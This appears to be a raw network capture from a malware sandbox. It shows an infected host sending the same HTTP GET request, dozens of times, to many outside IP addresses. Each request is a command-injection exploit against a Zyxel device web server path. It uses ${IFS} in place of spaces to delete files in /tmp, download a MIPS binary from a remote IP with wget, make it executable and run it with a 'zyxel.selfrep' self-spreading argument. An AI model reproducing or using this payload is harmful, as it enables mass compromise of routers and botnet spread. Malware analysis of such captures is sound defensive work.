                                                Jan 12, 2024 18:16:13.211793900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1999192.168.2.2358114212.190.120.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.211846113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2000192.168.2.233900489.181.63.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.211869955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2001192.168.2.2351834120.161.203.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.211910009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2002192.168.2.23430181.236.64.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.211944103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2003192.168.2.235427025.176.124.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.211972952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2004192.168.2.23344684.123.41.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.212007046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2005192.168.2.2344360151.187.168.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.212053061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2006192.168.2.2356456119.61.255.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.212104082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2007192.168.2.2346660175.249.176.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.212129116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2008192.168.2.233737035.144.60.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.212148905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2009192.168.2.236030884.3.80.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.212162018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2010192.168.2.234411019.106.41.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.212223053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2011192.168.2.2355482206.156.227.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.212244987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2012192.168.2.234514077.144.74.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.212279081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2013192.168.2.234159827.224.22.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.212328911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2014192.168.2.234782096.165.101.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.212352037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2015192.168.2.2359410160.66.63.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.212405920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2016192.168.2.233896072.246.77.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.212429047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2017192.168.2.234564823.251.125.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.212443113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2018192.168.2.2332866191.167.99.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.212471962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2019192.168.2.234382486.40.119.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.212512016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2020192.168.2.235346642.171.181.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.212575912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2021192.168.2.235172288.152.224.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.212589025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2022192.168.2.233608085.197.132.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.212630033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2023192.168.2.2360558187.130.204.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.212676048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2024192.168.2.234996854.143.253.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.212709904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2025192.168.2.236054888.193.242.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.212728024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2026192.168.2.2333438187.195.69.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.212781906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2027192.168.2.2342126208.5.187.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.212826967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2028192.168.2.235671018.61.96.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.212856054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2029192.168.2.2356768126.128.245.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.212896109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2030192.168.2.2344868179.216.35.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.212919950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2031192.168.2.2345870104.226.161.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.212949038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2032192.168.2.235826025.88.18.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.212986946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2033192.168.2.2354142157.79.166.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.213037968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2034192.168.2.235892478.14.93.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.213052988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2035192.168.2.23606565.221.80.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.213089943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2036192.168.2.235534024.72.14.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.213118076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2037192.168.2.2356534192.116.58.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.213150024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2038192.168.2.235407290.19.124.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.213179111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2039192.168.2.2348552194.151.156.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.213212967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2040192.168.2.235122698.44.120.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.213269949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2041192.168.2.2339888122.140.181.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.213274002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2042192.168.2.233315857.133.8.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.213327885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2043192.168.2.2346842156.64.240.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.213351965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2044192.168.2.2355520157.228.115.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.213377953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2045192.168.2.2336522140.135.214.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.213402033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2046192.168.2.2346330200.117.198.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.213434935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2047192.168.2.2333296171.17.13.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.213459015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2048192.168.2.2342772101.159.124.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.213510990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2049192.168.2.234192065.61.228.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.213536978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2050192.168.2.2338162123.12.94.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.213557005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2051192.168.2.2349282137.228.172.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.213623047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2052192.168.2.2335106161.111.12.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.213634968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2053192.168.2.2356144209.14.217.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.213649988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2054192.168.2.235851469.5.83.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.213680983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2055192.168.2.2344852223.186.127.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.213723898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2056192.168.2.2342158199.153.125.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.213751078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2057192.168.2.2360244211.204.115.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.213799953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2058192.168.2.2357710124.214.40.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.213836908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2059192.168.2.2352260153.175.45.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.213869095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2060192.168.2.234968892.44.228.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:13.213905096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2061192.168.2.2351504194.226.140.90443
                                                TimestampBytes transferredDirectionData
